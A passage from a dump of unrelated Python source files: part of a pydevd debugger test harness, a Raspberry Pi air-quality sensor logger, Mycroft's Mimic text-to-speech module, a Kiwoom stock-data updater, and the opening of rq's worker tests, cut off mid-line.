self.write("%s\t%s\tCMD_SHOW_RETURN_VALUES\t%s" % (CMD_SHOW_RETURN_VALUES, self.next_seq(), show)) def write_add_breakpoint(self, line, func='None', filename=None, hit_condition=None, is_logpoint=False, suspend_policy=None, condition=None): ''' :param line: starts at 1 :param func: if None, may hit in any context, empty string only top level, otherwise must be method name. ''' if filename is None: filename = self.get_main_filename() breakpoint_id = self.next_breakpoint_id() if hit_condition is None and not is_logpoint and suspend_policy is None and condition is None: # Format kept for backward compatibility tests self.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\tNone\tNone" % ( CMD_SET_BREAK, self.next_seq(), breakpoint_id, 'python-line', filename, line, func)) else: # Format: breakpoint_id, type, file, line, func_name, condition, expression, hit_condition, is_logpoint, suspend_policy self.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\tNone\t%s\t%s\t%s" % ( CMD_SET_BREAK, self.next_seq(), breakpoint_id, 'python-line', filename, line, func, condition, hit_condition, is_logpoint, suspend_policy)) self.log.append('write_add_breakpoint: %s line: %s func: %s' % (breakpoint_id, line, func)) return breakpoint_id def write_multi_threads_single_notification(self, multi_threads_single_notification): self.write_json_config(dict( multi_threads_single_notification=multi_threads_single_notification, )) def write_suspend_on_breakpoint_exception(self, skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception): self.write_json_config(dict( skip_suspend_on_breakpoint_exception=skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception=skip_print_breakpoint_exception )) def write_json_config(self, config_dict): self.write("%s\t%s\t%s" % (CMD_PYDEVD_JSON_CONFIG, self.next_seq(), json.dumps(config_dict) )) def write_stop_on_start(self, stop=True): self.write("%s\t%s\t%s" % (CMD_STOP_ON_START, self.next_seq(), stop)) def write_dump_threads(self): self.write("%s\t%s\t" % (CMD_THREAD_DUMP_TO_STDERR, self.next_seq())) def write_add_exception_breakpoint(self, exception): self.write("%s\t%s\t%s" % (CMD_ADD_EXCEPTION_BREAK, self.next_seq(), exception)) self.log.append('write_add_exception_breakpoint: %s' % (exception,)) def write_get_current_exception(self, thread_id): self.write("%s\t%s\t%s" % (CMD_GET_EXCEPTION_DETAILS, self.next_seq(), thread_id)) def write_set_py_exception_globals( self, break_on_uncaught, break_on_caught, skip_on_exceptions_thrown_in_same_context, ignore_exceptions_thrown_in_lines_with_ignore_exception, ignore_libraries, exceptions=() ): # Only set the globals, others self.write("131\t%s\t%s" % (self.next_seq(), '%s;%s;%s;%s;%s;%s' % ( 'true' if break_on_uncaught else 'false', 'true' if break_on_caught else 'false', 'true' if skip_on_exceptions_thrown_in_same_context else 'false', 'true' if ignore_exceptions_thrown_in_lines_with_ignore_exception else 'false', 'true' if ignore_libraries else 'false', ';'.join(exceptions) ))) self.log.append('write_set_py_exception_globals') def write_start_redirect(self): self.write("%s\t%s\t%s" % (CMD_REDIRECT_OUTPUT, self.next_seq(), 'STDERR STDOUT')) def write_set_project_roots(self, project_roots): self.write("%s\t%s\t%s" % (CMD_SET_PROJECT_ROOTS, self.next_seq(), '\t'.join(str(x) for x in project_roots))) def write_add_exception_breakpoint_with_policy( self, exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries): self.write("%s\t%s\t%s" % (CMD_ADD_EXCEPTION_BREAK, self.next_seq(), '\t'.join(str(x) for x in [ exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries]))) self.log.append('write_add_exception_breakpoint: %s' % (exception,)) def write_remove_exception_breakpoint(self, exception): self.write('%s\t%s\t%s' % (CMD_REMOVE_EXCEPTION_BREAK, self.next_seq(), exception)) def write_remove_breakpoint(self, breakpoint_id): self.write("%s\t%s\t%s\t%s\t%s" % ( CMD_REMOVE_BREAK, self.next_seq(), 'python-line', self.get_main_filename(), breakpoint_id)) def write_change_variable(self, thread_id, frame_id, varname, value): self.write("%s\t%s\t%s\t%s\t%s\t%s\t%s" % ( CMD_CHANGE_VARIABLE, self.next_seq(), thread_id, frame_id, 'FRAME', varname, value)) def write_get_frame(self, thread_id, frame_id): self.write("%s\t%s\t%s\t%s\tFRAME" % (CMD_GET_FRAME, self.next_seq(), thread_id, frame_id)) self.log.append('write_get_frame') def write_get_variable(self, thread_id, frame_id, var_attrs): self.write("%s\t%s\t%s\t%s\tFRAME\t%s" % (CMD_GET_VARIABLE, self.next_seq(), thread_id, frame_id, var_attrs)) def write_step_over(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_OVER, self.next_seq(), thread_id,)) def write_step_in(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_INTO, self.next_seq(), thread_id,)) def write_step_in_my_code(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_INTO_MY_CODE, self.next_seq(), thread_id,)) def write_step_return(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_RETURN, self.next_seq(), thread_id,)) def write_step_return_my_code(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_RETURN_MY_CODE, self.next_seq(), thread_id,)) def write_step_over_my_code(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_OVER_MY_CODE, self.next_seq(), thread_id,)) def write_suspend_thread(self, thread_id): self.write("%s\t%s\t%s" % (CMD_THREAD_SUSPEND, self.next_seq(), thread_id,)) def write_reload(self, module_name): self.log.append('write_reload') self.write("%s\t%s\t%s" % (CMD_RELOAD_CODE, self.next_seq(), module_name,)) def write_run_thread(self, thread_id): self.log.append('write_run_thread') self.write("%s\t%s\t%s" % (CMD_THREAD_RUN, self.next_seq(), thread_id,)) def write_get_thread_stack(self, thread_id): self.log.append('write_get_thread_stack') self.write("%s\t%s\t%s" % (CMD_GET_THREAD_STACK, self.next_seq(), thread_id,)) def write_load_source(self, filename): self.log.append('write_load_source') self.write("%s\t%s\t%s" % (CMD_LOAD_SOURCE, self.next_seq(), filename,)) def write_load_source_from_frame_id(self, frame_id): from _pydevd_bundle.pydevd_comm_constants import CMD_LOAD_SOURCE_FROM_FRAME_ID self.log.append('write_load_source_from_frame_id') self.write("%s\t%s\t%s" % (CMD_LOAD_SOURCE_FROM_FRAME_ID, self.next_seq(), frame_id,)) def write_kill_thread(self, thread_id): self.write("%s\t%s\t%s" % (CMD_THREAD_KILL, self.next_seq(), thread_id,)) def write_set_next_statement(self, thread_id, line, func_name): self.write("%s\t%s\t%s\t%s\t%s" % (CMD_SET_NEXT_STATEMENT, self.next_seq(), thread_id, line, func_name,)) def write_debug_console_expression(self, locator): self.write("%s\t%s\t%s" % (CMD_EVALUATE_CONSOLE_EXPRESSION, self.next_seq(), locator)) def write_custom_operation(self, locator, style, codeOrFile, operation_fn_name): self.write("%s\t%s\t%s||%s\t%s\t%s" % ( CMD_RUN_CUSTOM_OPERATION, self.next_seq(), locator, style, codeOrFile, operation_fn_name)) def write_evaluate_expression(self, locator, expression): self.write("%s\t%s\t%s\t%s\t1" % (CMD_EVALUATE_EXPRESSION, self.next_seq(), locator, expression)) def write_enable_dont_trace(self, enable): if enable: enable = 'true' else: enable = 'false' self.write("%s\t%s\t%s" % (CMD_ENABLE_DONT_TRACE, self.next_seq(), enable)) def write_get_next_statement_targets(self, thread_id, frame_id): self.write("201\t%s\t%s\t%s" % (self.next_seq(), thread_id, frame_id)) self.log.append('write_get_next_statement_targets') def write_list_threads(self): seq = self.next_seq() self.write("%s\t%s\t" % (CMD_LIST_THREADS, seq)) return seq def wait_for_list_threads(self, seq): return self.wait_for_message('502') def wait_for_get_thread_stack_message(self): return self.wait_for_message(CMD_GET_THREAD_STACK) def wait_for_json_message(self, accept_message, unquote_msg=True, timeout=None): last = self.wait_for_message(accept_message, unquote_msg, expect_xml=False, timeout=timeout) json_msg = last.split('\t', 2)[-1] # We have something as: CMD\tSEQ\tJSON if isinstance(json_msg, bytes): json_msg = json_msg.decode('utf-8') try: return json.loads(json_msg) except: traceback.print_exc() raise AssertionError('Unable to parse:\n%s\njson:\n%s' % (last, json_msg)) def wait_for_message(self, accept_message, unquote_msg=True, expect_xml=True, timeout=None): if isinstance(accept_message, (str, int)): msg_starts_with = '%s\t' % (accept_message,) def accept_message(msg): return msg.startswith(msg_starts_with) import untangle from io import StringIO prev = None while True: last = self.get_next_message('wait_for_message', timeout=timeout) if unquote_msg: last = unquote_plus(unquote_plus(last)) if accept_message(last): if expect_xml: # Extract xml and return untangled. xml = '' try: xml = last[last.index('<xml>'):] if isinstance(xml, bytes): xml = xml.decode('utf-8') xml = untangle.parse(StringIO(xml)) except: traceback.print_exc() raise AssertionError('Unable to parse:\n%s\nxml:\n%s' % (last, xml)) ret = xml.xml ret.original_xml = last return ret else: return last if prev != last: print('Ignored message: %r' % (last,)) prev = last def get_frame_names(self, thread_id): self.write_get_thread_stack(thread_id) msg = self.wait_for_message(CMD_GET_THREAD_STACK) if msg.thread.frame: frame_names = [frame['name'] for frame in msg.thread.frame] return frame_names return [msg.thread.frame['name']] def wait_for_thread_join(self, main_thread_id): def condition(): return self.get_frame_names(main_thread_id) in ( ['wait', 'join', '<module>'], ['_wait_for_tstate_lock', 'join', '<module>'] ) def msg(): return 'Found stack: %s' % (self.get_frame_names(main_thread_id),) wait_for_condition(condition, msg, timeout=5, sleep=.5) def create_request_thread(self, full_url): class T(threading.Thread): def wait_for_contents(self): for _ in range(10): if hasattr(self, 'contents'): break time.sleep(.3) else: raise AssertionError('Unable to get contents from server. Url: %s' % (full_url,)) return self.contents def run(self): try: from urllib.request import urlopen except ImportError: from urllib import urlopen for _ in range(10): try: stream = urlopen(full_url) contents = stream.read() if IS_PY3K: contents = contents.decode('utf-8') self.contents = contents break except IOError: continue t = T() t.daemon = True return t def _get_debugger_test_file(filename): ret = os.path.abspath(os.path.join(os.path.dirname(__file__), filename)) if not os.path.exists(ret): ret = os.path.join(os.path.dirname(__file__), 'resources', filename) if not os.path.exists(ret): raise AssertionError('Expected: %s to exist.' % (ret,)) return ret def get_free_port(): from _pydev_bundle.pydev_localhost import get_socket_name return get_socket_name(close=True)[1]
start.py
#!/usr/bin/env python #imports from __future__ import print_function import threading as th import multiprocessing as mp import serial import time import struct import datetime import sys import os.path sys.path.append("..") #Import varaibles in run from AQ_Plot_server directory sys.path.append(sys.path[0][0:sys.path[0].find("AQ_run")]) #Import varaiblesif run from home directory import variables as V if V.DHTON=="ON": from DHT import DHT MODE=V.MODE if MODE=="GPS": from GPS2 import Work #IF GPS is on import module if V.BLINKT=="ON": from blinkt import set_pixel, set_brightness, show, clear from sds_rec import SDS011 as sds #Gloabl varaibles FOLDER=V.DATAFOLDER #Folder location for data save LOCATION=V.LOC[0] #RPI3 operation location lat=V.LOC[1]#location latatuide lon=V.LOC[2]#location longatuide RPI=V.DEVICERAN def initFile(date,RPI,FOLDER,LOCATION,SENSORS): #create columes depending on sensors and OPRATION columns="time" NAMES="" if MODE =="GPS": LOCATION=LOCATION+"_GPS" columns=columns+",lat,lon,alt" if V.DHTON=="ON": for sen in V.DHTNAMES: columns=columns+",DHT-RH,DHT-T" if V.OPCON=="ON": for sen in SENSORS: #check which sensors are running to add to the csv filre name (If multiple add the togher in order data is made) if NAMES=="": NAMES=NAMES+sen else: NAMES=NAMES+","+str(sen)#solution to odd error, when python does not think str are str #loop through sensors to create columns if "SDS" in sen or "sds" in sen: columns=columns+",sds-pm2.5,sds-pm10,sds-ExtraData" #Note: ExtraData is a extra bit of data recored by the SDS but there no information on what it actully is. If you know please let me know. #create the csv csvnames=NAMES.replace(",","-") #replace the commers from the Sensors names to add tio file name ofile= FOLDER + LOCATION +"_"+ RPI+'_' +csvnames+"_"+ str(date).replace('-','') + ".csv" # print("Opening Output File:") if(not os.path.isfile(ofile)): print("creat new file ",ofile) f=open(ofile,'w+')#open file #First add time period ts = time.time() tnow = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') print("Time Period,start:,"+tnow+",end:,",file=f) #Add sensors information print("Sensors:,"+NAMES,file=f) #Add locations print("Location:,"+LOCATION+",Lat-Lon,"+lat+","+lon,file=f) #Add interval time print("Interval time,"+str(V.integration),file=f) #Add data columns print(columns,file=f) else: f=open(ofile,'a') #if already created append to file return f if __name__ == "__main__": #run sensors runsen=V.RUNSEN if V.DHTON=="ON": for DHTN in V.DHTNAMES: runsen.append(DHTN) print(RPI, " Starting in Mode: ",V.MODE, "Sensors:", V.RUNSEN," Time: ", datetime.datetime.now(),"Location:",V.LOC[0]) inter=V.integration#Interval time between readings P=V.RUNPORT R=V.RUNSEN #Array for operational sensors class calls opsen=[] for r in R: if "SDS" in r: opsen.append(sds) #get the processes to run print("Starting AQ RPI, Mode:", V.MODE) print("**************************************************") if V.BLINKT=="ON": print("********************************") print("BLINKT ON") print("integration time (seconds)",inter) print("**************************************************") #processes=[mp.Process(target=c,args=(p,r)) for c,p ,r in zip(opsen,P,R)] #run all the processes if V.OPCON=="ON": Sen=[] for sen, p, r in zip(opsen,P,R): Start=sen(p,r) #initiate the sensors Sen.append(Start) print(r," Ready") print(len(Sen)) time.sleep(4) points=0 #data point longer starttime = datetime.datetime.now() while time.time() % inter != 0: pass print("Looping") while True: #set stars datestart = datetime.date.today() #Create file if not alrady created if MODE=="GPS" or MODE=="TEST": #if GPS or a TEST add the time in mins to the file name f=initFile(starttime.strftime('%Y%m%d-%H%M%S'),RPI,FOLDER,LOCATION,R) else: #file name just with date f = initFile(datestart,RPI,FOLDER,LOCATION,R) ts = time.time() tnow = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') data=tnow if MODE=="GPS": #IF GPS is attahced and turned on, get GPS data lat,lon,alt= Work() print("Lat:",lat,"Lon",lon) data=data+","+str(lat)+","+str(lon)+","+str(alt) if V.DHTON=="ON": #Get DHT data, for all DHT attached for DH, PIN in zip(V.DHTNAMES,V.DHTPINS): HT=DHT() RH, T= HT.getData(DH,PIN) data=data+","+str(RH)+","+str(T) #run through each sensors reading there data if V.OPCON=="ON": for pro, r,p in zip(Sen,R,P): #loop through OPC newdata=pro.getData(p,r) data=data+","+newdata if "spi error" in newdata.lower(): pro=sen(p,r) #initiate the sensors #restate senors in SPI error occres if V.BLINKT=="ON": clear() set_pixel(0,10,10,10) set_pixel(1,10,10,10) show() time.sleep(0.5) PM=float(newdata.split(",")[0]) if "nan" not in str(PM).lower(): #if not nan set color COLOR=0 COLRVAL={0:[0,100,0],1:[0,100,50],2:[100,50,0],3:[100,0,0]} for Limit in V.PMVALUE: if PM>Limit: COLOR=COLOR+1 clear() set_pixel(0,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(1,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(2,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(3,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(4,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(5,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(6,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(7,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) show() #printe all data and write it to the file print(data,file=f) points=points+1#add a point to point arraw #prase to csv f.flush() if (datetime.date.today() - datestart).days > 0: #add end info #too do add write point and end time to top data f.close() datestart = datetime.date.today() f = initFile(datestart,RPI,FOLDER,LOCATION,R) secondsToRun = (datetime.datetime.now()-starttime).total_seconds() % inter time.sleep(inter-secondsToRun)
mimic_tts.py
# Copyright 2017 Mycroft AI Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import stat import subprocess from threading import Thread from time import time, sleep import os.path from os.path import exists, join, expanduser from mycroft import MYCROFT_ROOT_PATH from mycroft.api import DeviceApi from mycroft.configuration import Configuration from mycroft.tts import TTS, TTSValidator from mycroft.util.download import download from mycroft.util.log import LOG config = Configuration.get().get("tts").get("mimic") data_dir = expanduser(Configuration.get()['data_dir']) BIN = config.get("path", os.path.join(MYCROFT_ROOT_PATH, 'mimic', 'bin', 'mimic')) if not os.path.isfile(BIN): # Search for mimic on the path import distutils.spawn BIN = distutils.spawn.find_executable("mimic") SUBSCRIBER_VOICES = {'trinity': join(data_dir, 'voices/mimic_tn')} def download_subscriber_voices(selected_voice): """ Function to download all premium voices, starting with the currently selected if applicable """ def make_executable(dest): """ Call back function to make the downloaded file executable. """ LOG.info('Make executable') # make executable st = os.stat(dest) os.chmod(dest, st.st_mode | stat.S_IEXEC) # First download the selected voice if needed voice_file = SUBSCRIBER_VOICES.get(selected_voice) if voice_file is not None and not exists(voice_file): LOG.info('voice doesn\'t exist, downloading') url = DeviceApi().get_subscriber_voice_url(selected_voice) # Check we got an url if url: dl = download(url, voice_file, make_executable) # Wait for completion while not dl.done: sleep(1) else: LOG.debug('{} is not available for this architecture' .format(selected_voice)) # Download the rest of the subsciber voices as needed for voice in SUBSCRIBER_VOICES: voice_file = SUBSCRIBER_VOICES[voice] if not exists(voice_file): url = DeviceApi().get_subscriber_voice_url(voice) # Check we got an url if url: dl = download(url, voice_file, make_executable) # Wait for completion while not dl.done: sleep(1) else: LOG.debug('{} is not available for this architecture' .format(voice)) class Mimic(TTS): def __init__(self, lang, config): super(Mimic, self).__init__( lang, config, MimicValidator(self), 'wav', ssml_tags=["speak", "ssml", "phoneme", "voice", "audio", "prosody"] ) self.dl = None self.clear_cache() # Download subscriber voices if needed self.is_subscriber = DeviceApi().is_subscriber if self.is_subscriber: t = Thread(target=download_subscriber_voices, args=[self.voice]) t.daemon = True t.start() def modify_tag(self, tag): for key, value in [ ('x-slow', '0.4'), ('slow', '0.7'), ('medium', '1.0'), ('high', '1.3'), ('x-high', '1.6'), ('speed', 'rate') ]: tag = tag.replace(key, value) return tag @property def args(self): """ Build mimic arguments. """ if (self.voice in SUBSCRIBER_VOICES and exists(SUBSCRIBER_VOICES[self.voice]) and self.is_subscriber): # Use subscriber voice mimic_bin = SUBSCRIBER_VOICES[self.voice] voice = self.voice elif self.voice in SUBSCRIBER_VOICES: # Premium voice but bin doesn't exist, use ap while downloading mimic_bin = BIN voice = 'ap' else: # Normal case use normal binary and selected voice mimic_bin = BIN voice = self.voice args = [mimic_bin, '-voice', voice, '-psdur', '-ssml'] stretch = config.get('duration_stretch', None) if stretch: args += ['--setf', 'duration_stretch=' + stretch] return args def get_tts(self, sentence, wav_file): # Generate WAV and phonemes phonemes = subprocess.check_output(self.args + ['-o', wav_file, '-t', sentence]) return wav_file, phonemes.decode() def visime(self, output): visimes = [] start = time() pairs = str(output).split(" ") for pair in pairs: pho_dur = pair.split(":") # phoneme:duration if len(pho_dur) == 2: visimes.append((VISIMES.get(pho_dur[0], '4'), float(pho_dur[1]))) print(visimes) return visimes class MimicValidator(TTSValidator): def __init__(self, tts): super(MimicValidator, self).__init__(tts) def validate_lang(self): # TODO: Verify version of mimic can handle the requested language pass def validate_connection(self): try: subprocess.call([BIN, '--version']) except: LOG.info("Failed to find mimic at: " + BIN) raise Exception( 'Mimic was not found. Run install-mimic.sh to install it.') def get_tts_class(self): return Mimic # Mapping based on Jeffers phoneme to viseme map, seen in table 1 from: # http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.221.6377&rep=rep1&type=pdf # # Mycroft unit visemes based on images found at: # http://www.web3.lu/wp-content/uploads/2014/09/visemes.jpg # # Mapping was created partially based on the "12 mouth shapes visuals seen at: # https://wolfpaulus.com/journal/software/lipsynchronization/ VISIMES = { # /A group 'v': '5', 'f': '5', # /B group 'uh': '2', 'w': '2', 'uw': '2', 'er': '2', 'r': '2', 'ow': '2', # /C group 'b': '4', 'p': '4', 'm': '4', # /D group 'aw': '1', # /E group 'th': '3', 'dh': '3', # /F group 'zh': '3', 'ch': '3', 'sh': '3', 'jh': '3', # /G group 'oy': '6', 'ao': '6', # /Hgroup 'z': '3', 's': '3', # /I group 'ae': '0', 'eh': '0', 'ey': '0', 'ah': '0', 'ih': '0', 'y': '0', 'iy': '0', 'aa': '0', 'ay': '0', 'ax': '0', 'hh': '0', # /J group 'n': '3', 't': '3', 'd': '3', 'l': '3', # /K group 'g': '3', 'ng': '3', 'k': '3', # blank mouth 'pau': '4', }
updater_short.py
import os import sys import time import sqlite3 import zipfile import pythoncom import pandas as pd from PyQt5 import QtWidgets from PyQt5.QAxContainer import QAxWidget from multiprocessing import Process, Queue, Lock sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from login.manuallogin import find_window, manual_login from utility.static import strf_time, now, telegram_msg from utility.setting import openapi_path, sn_brrq, db_day, db_stg app = QtWidgets.QApplication(sys.argv) class UpdaterShort: def __init__(self, gubun, queryQQ, lockk): self.gubun = gubun self.queryQ = queryQQ self.lock = lockk self.str_trname = None self.str_tday = strf_time('%Y%m%d') self.df_tr = None self.dict_tritems = None self.dict_bool = { '로그인': False, 'TR수신': False } self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1') self.ocx.OnEventConnect.connect(self.OnEventConnect) self.ocx.OnReceiveTrData.connect(self.OnReceiveTrData) self.Start() def Start(self): self.CommConnect() self.Updater() def CommConnect(self): self.ocx.dynamicCall('CommConnect()') while not self.dict_bool['로그인']: pythoncom.PumpWaitingMessages() def Updater(self): con = sqlite3.connect(db_stg) df = pd.read_sql('SELECT * FROM short', con) con.close() df = df.set_index('index') codes = list(df.index) codes = [code for i, code in enumerate(codes) if i % 4 == self.gubun] count = len(codes) for i, code in enumerate(codes): time.sleep(3.6) self.lock.acquire() df = self.Block_Request('opt10081', 종목코드=code, 기준일자=self.str_tday, 수정주가구분=1, output='주식일봉차트조회', next=0) self.lock.release() df = df.set_index('일자') df = df[::-1] df[['현재가', '시가']] = df[['현재가', '시가']].astype(int).abs() preshort = 1 if df['현재가'][-1] > df['시가'][-1] and df['현재가'][-1] >= df['현재가'][-2] * 1.07 else 0 self.queryQ.put([code, preshort]) print(f'[{now()}] {self.gubun} 데이터 업데이트 중 ... [{i + 1}/{count}]') if self.gubun == 3: self.queryQ.put('업데이트완료') sys.exit() def OnEventConnect(self, err_code): if err_code == 0: self.dict_bool['로그인'] = True def OnReceiveTrData(self, screen, rqname, trcode, record, nnext): if screen == '' and record == '': return items = None self.dict_bool['TR다음'] = True if nnext == '2' else False for output in self.dict_tritems['output']: record = list(output.keys())[0] items = list(output.values())[0] if record == self.str_trname: break rows = self.ocx.dynamicCall('GetRepeatCnt(QString, QString)', trcode, rqname) if rows == 0: rows = 1 df2 = [] for row in range(rows): row_data = [] for item in items: data = self.ocx.dynamicCall('GetCommData(QString, QString, int, QString)', trcode, rqname, row, item) row_data.append(data.strip()) df2.append(row_data) df = pd.DataFrame(data=df2, columns=items) self.df_tr = df self.dict_bool['TR수신'] = True def Block_Request(self, *args, **kwargs): trcode = args[0].lower() liness = self.ReadEnc(trcode) self.dict_tritems = self.ParseDat(trcode, liness) self.str_trname = kwargs['output'] nnext = kwargs['next'] for i in kwargs: if i.lower() != 'output' and i.lower() != 'next': self.ocx.dynamicCall('SetInputValue(QString, QString)', i, kwargs[i]) self.dict_bool['TR수신'] = False self.ocx.dynamicCall('CommRqData(QString, QString, int, QString)', self.str_trname, trcode, nnext, sn_brrq) while not self.dict_bool['TR수신']: pythoncom.PumpWaitingMessages() return self.df_tr # noinspection PyMethodMayBeStatic def ReadEnc(self, trcode): enc = zipfile.ZipFile(f'{openapi_path}/data/{trcode}.enc') liness = enc.read(trcode.upper() + '.dat').decode('cp949') return liness # noinspection PyMethodMayBeStatic def ParseDat(self, trcode, liness): liness = liness.split('\n') start = [i for i, x in enumerate(liness) if x.startswith('@START')] end = [i for i, x in enumerate(liness) if x.startswith('@END')] block = zip(start, end) enc_data = {'trcode': trcode, 'input': [], 'output': []} for start, end in block: block_data = liness[start - 1:end + 1] block_info = block_data[0] block_type = 'input' if 'INPUT' in block_info else 'output' record_line = block_data[1] tokens = record_line.split('_')[1].strip() record = tokens.split('=')[0] fields = block_data[2:-1] field_name = [] for line in fields: field = line.split('=')[0].strip() field_name.append(field) fields = {record: field_name} enc_data['input'].append(fields) if block_type == 'input' else enc_data['output'].append(fields) return enc_data class Query: def __init__(self, queryQQ): self.queryQ = queryQQ self.con = sqlite3.connect(db_day) self.Start() def __del__(self): self.con.close() def Start(self): df_short = pd.DataFrame(columns=['preshort']) while True: data = self.queryQ.get() if data != '업데이트완료': df_short.at[data[0]] = data[1] else: break con = sqlite3.connect(db_stg) df = pd.read_sql('SELECT * FROM short', con) df = df.set_index('index') df['preshort'] = df_short['preshort'] df.to_sql('short', con, if_exists='replace', chunksize=1000) con.close() telegram_msg('short DB를 업데이트하였습니다.') sys.exit() if __name__ == '__main__': queryQ = Queue() lock = Lock() login_info = f'{openapi_path}/system/Autologin.dat' if os.path.isfile(login_info): os.remove(f'{openapi_path}/system/Autologin.dat') Process(target=Query, args=(queryQ,)).start() Process(target=UpdaterShort, args=(0, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(1) while find_window('Open API login') != 0: time.sleep(1) Process(target=UpdaterShort, args=(1, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(2) while find_window('Open API login') != 0: time.sleep(1) Process(target=UpdaterShort, args=(2, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(3) while find_window('Open API login') != 0: time.sleep(1) Process(target=UpdaterShort, args=(3, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(4) while find_window('Open API login') != 0: time.sleep(1)
test_worker.py
# -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function, unicode_literals) import json import os import psutil import shutil import signal import subprocess import sys import time import zlib from datetime import datetime, timedelta, timezone from multiprocessing import Process from time import sleep from unittest import skipIf import redis.exceptions import pytest import mock from mock import Mock from tests import RQTestCase, slow from tests.fixtures import ( access_self, create_file, create_file_after_timeout, create_file_after_timeout_and_setsid, div_by_zero, do_nothing, kill_worker, long_running_job, modify_self, modify_self_and_error, run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid, raise_exc_mock, launch_process_within_worker_and_store_pid ) from rq import Queue, SimpleWorker, Worker, get_current_connection from rq.compat import as_text, PY2 from rq.job import Job, JobStatus, Retry from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry from rq.suspension import resume, suspend from rq.utils import utcnow from rq.version import VERSION from rq.worker import HerokuWorker, WorkerStatus, RoundRobinWorker, RandomWorker from rq.serializers import JSONSerializer class CustomJob(Job): pass class CustomQueue(Queue): pass class TestWorker(RQTestCase): def test_create_worker(self): """Worker creation using various inputs.""" # With single string argument w = Worker('foo') self.assertEqual(w.queues[0].name, 'foo') # With list of strings w = Worker(['foo', 'bar']) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key]) self.assertEqual(w.queue_names(), ['foo', 'bar']) # With iterable of strings w = Worker(iter(['foo', 'bar'])) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # Also accept byte strings in Python 2 if PY2: # With single byte string argument w = Worker(b'foo') self.assertEqual(w.queues[0].name, 'foo') # With list of byte strings w = Worker([b'foo', b'bar']) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With iterable of byte strings w = Worker(iter([b'foo', b'bar'])) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With single Queue w = Worker(Queue('foo')) self.assertEqual(w.queues[0].name, 'foo') # With iterable of Queues w = Worker(iter([Queue('foo'), Queue('bar')])) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With list of Queues w = Worker([Queue('foo'), Queue('bar')]) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With string and serializer w = Worker('foo', serializer=json) self.assertEqual(w.queues[0].name, 'foo') # With queue having serializer w = Worker(Queue('foo'), serializer=json) self.assertEqual(w.queues[0].name, 'foo') def test_work_and_quit(self): """Worker processes work, then quits.""" fooq, barq = Queue('foo'), Queue('bar') w = Worker([fooq, barq]) self.assertEqual( w.work(burst=True), False, 'Did not expect any work on the queue.' ) fooq.enqueue(say_hello, name='Frank') self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) def test_work_and_quit_custom_serializer(self): """Worker processes work, then quits.""" fooq, barq = Queue('foo', serializer=JSONSerializer), Queue('bar', serializer=JSONSerializer) w = Worker([fooq, barq], serializer=JSONSerializer) self.assertEqual( w.work(burst=True), False, 'Did not expect any work on the queue.' ) fooq.enqueue(say_hello, name='Frank') self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) def test_worker_all(self): """Worker.all() works properly""" foo_queue = Queue('foo') bar_queue = Queue('bar') w1 = Worker([foo_queue, bar_queue], name='w1') w1.register_birth() w2 = Worker([foo_queue], name='w2') w2.register_birth() self.assertEqual( set(Worker.all(connection=foo_queue.connection)), set([w1, w2]) ) self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2])) self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1])) w1.register_death() w2.register_death() def test_find_by_key(self): """Worker.find_by_key restores queues, state and job_id.""" queues = [Queue('foo'), Queue('bar')] w 